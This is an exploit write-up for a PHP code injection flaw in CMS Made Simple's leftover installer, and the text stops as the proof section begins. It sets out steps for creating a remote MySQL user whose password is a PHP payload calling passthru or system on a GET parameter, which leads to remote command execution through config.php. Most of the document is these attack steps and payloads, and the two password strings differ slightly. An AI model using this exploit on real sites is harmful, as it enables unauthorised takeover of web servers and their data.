# CMS Made Simple PHP Code Injection Vulnerability (All versions)
# 2014-12-02
# SAHM (@post.com)
# cmsmadesimple.org
# All versions
---exploit
A malicious attacker can intrude every CMSMS-installed website by taking the following steps:
Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress).
Ex: http://URL/PATH/install
Pass through the steps to get to the fifth step.
In a remote host, install a MySQL server and create the following user:
user: test
password : '.passthru($_GET['command']);exit;//
Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) .
Fill in the Database Information form (bottom of the page).
db host address: the remote host's IP
user: test
password: '.system($_GET['command']);exit;//
database name: the name of the remote database which has been built
After installation, commands can be injected as:
http://URL/PATH?command=blah%20blah
---prove
At this point, the config.php file content would be something like this:
<?php
# CMS Made Simple Configuration File
# Documentation: /doc/CMSMS_config_reference.pdf
#
